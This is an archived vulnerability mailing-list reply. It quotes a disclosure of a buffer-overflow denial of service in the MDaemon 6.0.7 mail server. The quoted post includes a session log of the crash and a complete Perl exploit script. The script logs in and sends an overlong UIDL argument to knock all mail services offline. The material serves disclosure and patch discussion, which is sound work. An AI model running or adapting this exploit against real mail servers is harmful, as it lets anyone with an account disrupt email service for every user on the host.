[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[VulnDiscuss] Re: MDaemon SMTP/POP/IMAP server DoS



There have been earlier issues with UIDL and DoS conditions in MDaemon 2.8.5.0 (to be specific). 
Check bid 1366, http://online.securityfocus.com/bid/1366/

The website still offers 6.0.7 (vulnerable) version for download,
So apparently no workaround exists except for shutting it down until
the patch or newer version is available.


Regards
--------
Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- D4rkGr3y <grey_1999@xxxxxxx> wrote:
>######################################################
>#Product: MDaemon SMTP/POP/IMAP server               #
>#Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
>#Vulnerable versions: v.6.0.7 and bellow             #
>#Vulnerability: buffer overflow                      #
>#Bug&exploit by D4rkGr3y [www.dhgroup.org]           #
>######################################################
>
>#Overview#--------------------------------------------------------------#
>From MDaemon's help file:
>"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
>commonplace on UNIX hosts and the Internet to Windows based servers
>and microcomputers. MDaemon is designed to manage the email needs of
>any number of individual users and comes complete with a powerful set
>of integrated tools for managing mail accounts and message formats.
>MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
>with LDAP support, an integrated browser-based email client, content
>filtering, spam blockers, extensive security features, and more."
>
>#Problem#----------------------------------------------------------------#
>Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
>sending long arguments (32b and above) with DELE or UIDL commands.
>To do this u must have at least mail-account on vulnerable host.
>After geting long request from client, all MDaemon's Services will be
>closed (smtp, imap, pop, (?)worldclient).
>Here the log of attack on local MDaemon POP-server:
>
>+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210
>271036.AA3656130MD0012@xxxxxxx>
>USER D4rkGr3y
>+OK D4rkGr3y... Recipient ok
>PASS cool-pass
>+OK D4rkGr3y@xxxxxxx's mailbox has 1 total messages (18356 octets).
>UIDL 11111111111111111111111111111111
>
>Connection to host lost...
>
>#Exploit#----------------------------------------------------------------#
>
>#!/usr/bin/perl
>#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
>use IO::Socket;
>$host = "[vuln_host]";
>$login = "[login]";
>$pass = "[pass]";
>$port = "110";
>$data = "1";
>$num = "32";
>$buf .= $data x $num;
>$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
>or die "Couldn't connect: @!\n";
>print $socket "USER $login\n";
>print $socket "PASS $user\n";
>print $socket "UIDL $buf\n";
>close($socket);
>
>#EOF
>
>Best regards               www.dhgroup.org
>  D4rkGr3y                    icq 540981

_____________________________________________________________
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------

_____________________________________________________________
Select your own custom email address for FREE! Get you@xxxxxxxxxxxxxx w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag